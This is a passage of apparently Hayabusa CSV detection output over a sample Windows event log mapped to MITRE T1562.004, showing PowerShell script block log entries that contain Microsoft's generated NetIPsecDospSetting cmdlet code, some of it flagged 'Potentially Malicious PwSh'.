[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper 
= $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType 
= 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue 
= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
